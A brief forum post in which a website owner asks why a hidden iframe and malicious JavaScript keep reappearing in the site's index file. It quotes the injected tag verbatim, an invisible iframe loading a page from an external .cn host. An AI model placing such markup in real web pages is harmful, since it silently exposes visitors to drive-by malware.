iframe/script attack to website
- by Ram
I faced a website attack problem that some malicious javascript code added to all pages in my webiste.
Recently I faced another problem that my website is attacked with the following "iframe" tag.
iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden"
Even if I remove this tag, the index file of website is updated on daily basis. What would be the reason for this behaviour?
Please give me a solution to solve this.